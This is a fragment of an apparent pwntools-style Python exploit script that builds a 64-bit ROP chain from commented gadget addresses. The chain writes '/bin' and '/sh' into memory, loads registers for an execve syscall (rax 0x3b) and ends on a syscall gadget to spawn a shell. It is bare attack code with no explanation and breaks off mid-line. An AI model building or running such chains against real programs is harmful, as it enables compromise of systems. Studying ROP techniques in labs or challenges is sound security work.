payload = p64(0x4017ca)
#0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x80)+p64(0x4241bf)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x401257)
# 0x401257: add eax, 0x22e2b ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017ca)
# 0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x401553)+p64(0x4242b4)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x401257)
# 0x401257: add eax, 0x22e2b ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017ca)
# 0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x4017d1)+p64(0x424204)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x401257)
# 0x401257: add eax, 0x22e2b ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017ca)
# 0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x6e69622f)+p64(0x4240ad)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017ca)
# 0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x68662f)+p64(0x4240b1)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x424070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x424268)+p64(0x0)+p64(0x41432f)
# 0x000000000041432f: pop rax; add bh, bh; jmp qword ptr [rsi + 0xf]; 
payload += p64(0x36b23f97)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x4241b8)+p64(0x0)+p64(0x41432f)
# 0x000000000041432f: pop rax; add bh, bh; jmp qword ptr [rsi + 0xf]; 
payload += p64(0x3b)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4081cb)
# 0x00000000004081cb: syscall; ret; 
payload +=
